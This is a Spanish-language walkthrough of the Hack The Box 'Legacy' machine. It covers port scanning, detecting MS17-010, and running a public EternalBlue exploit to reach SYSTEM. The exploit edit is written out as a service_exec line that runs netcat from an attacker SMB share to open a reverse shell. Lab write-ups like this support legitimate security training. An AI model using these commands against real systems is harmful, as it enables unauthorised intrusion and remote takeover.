# Legacy

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FALxzq3PDR5b5ft5LhREh%2FLegacy.png?alt=media&#x26;token=fcbf6b8b-1a65-4cae-b735-01a9177d499d" alt=""><figcaption></figcaption></figure>

Comenzamos la maquina enumerando los puertos abiertos con nmap, enumeraremos todos los puertos con el parámetro **-p-** y filtraremos solo los puertos que estén abiertos.

```bash
sudo nmap -p- --open -sS -min-rate 5000 -Pn -n 10.129.227.181 -oG allPorts
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FuygvZhtpGEHTB94p9Q8M%2Fimage.png?alt=media&#x26;token=948ce140-e358-4b86-b4ba-d5ac0c79f2ea" alt=""><figcaption></figcaption></figure>

Aquí vemos los puertos abiertos de la maquina victima, vamos a lanzar una enumeración para que nos muestre más información de los servicios, como versiones, dominio, aplicación.

```bash
nmap -sCV -p135,139,445 10.129.227.181 -Pn -oN target
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FoRB3ik40b6IS2aolEH7Y%2Fimage.png?alt=media&#x26;token=540f6ebf-6632-49e6-a488-d0891a02432c" alt=""><figcaption></figcaption></figure>

No vemos nada interesante, solo los puertos 139,445 abiertos. Vamos a lanzar un script de nmap para detectar si es vulnerable algún exploit que tiene nmap por defecto.

```bash
nmap -p445 --script "vuln" 10.129.227.181
```

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FoSiVCMMbEpmCT8Iro06e%2Fimage.png?alt=media&#x26;token=be38cc0a-9f3b-4905-917e-f70d03f26c0a" alt=""><figcaption></figcaption></figure>

Vemos que tiene una vulnerabilidad, MS17-010 (esta maquina es similar ha Blue). Vamos a buscar el mismo exploit que usamos para la maquina Blue.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FQc4Zks5DW5l35hNeh9hN%2Fimage.png?alt=media&#x26;token=adb08967-8220-4bff-9a66-a562d05ebf59" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Permite a atacantes remotos ejecutar código arbitrario a través de paquetes diseñados, también conocida como "vulnerabilidad de ejecución remota de código SMB en Windows".

<https://nvd.nist.gov/vuln/detail/cve-2017-0144>
{% endhint %}

Vamos al enlace [**https://github.com/worawit/MS17-010**](https://github.com/worawit/MS17-010) y nos descargamos el repositorio.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2F81sfshZM1lFsaUmulQ8e%2Fimage.png?alt=media&#x26;token=119973a3-d43a-4fe4-b1b2-f980a004d333" alt=""><figcaption></figcaption></figure>

Esta vez lanzaremos el checker.py sin agregarle ningun usuario "guest".

Nos dara un pipe.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2F0UJtBkeNy9UAlnGzs3y5%2Fimage.png?alt=media&#x26;token=9536995a-dca5-4c0c-9e38-66fd296b8c44" alt=""><figcaption></figcaption></figure>

Nos iremos al archivo zzz\_exploit.py y comentaremos todas las líneas de este apartado y desmarcamos la línea de service\_exec.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FZocYAPHJVSPHS3F7oLJV%2Fimage.png?alt=media&#x26;token=b168a0a7-c614-4953-894f-4b3216c5f396" alt=""><figcaption></figcaption></figure>

```bash
service_exec(conn, r'cmd /c \\10.10.16.31\smbFolder\nc.exe -e cmd 10.10.16.31 443')
```

Tendremos que crear un recurso compartido para que ejecute netcat en la maquina victima y conseguir la reverse shell.

Nos pondremos también en escucha con netcat para recibir la reverse shell.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FSPikigHllthQbFrZtBKl%2Fimage.png?alt=media&#x26;token=22dea382-ee74-4361-81d0-72e252b541bb" alt=""><figcaption></figcaption></figure>

Una vez compartimos el recurso, lanzamos zzz\_exploit.py con el pipe spoolss.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FGFy4oOvtIywqQ7O6kXKd%2Fimage.png?alt=media&#x26;token=05813951-5174-4007-a21e-c58e2a48fe2a" alt=""><figcaption></figcaption></figure>

Esperamos un poco ha que termine de ejecutarse el script y vemos en el netcat que tenemos la reverse shell.

<figure><img src="https://2982264145-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MamKyPczuN7KvAeItev%2Fuploads%2FOYKVxqyHqD8dfmwZSmnM%2Fimage.png?alt=media&#x26;token=be9509e8-8054-4b8f-a002-b18709e6291a" alt=""><figcaption></figcaption></figure>

Con esto somos NT AUTHORITY\SYSTEM.
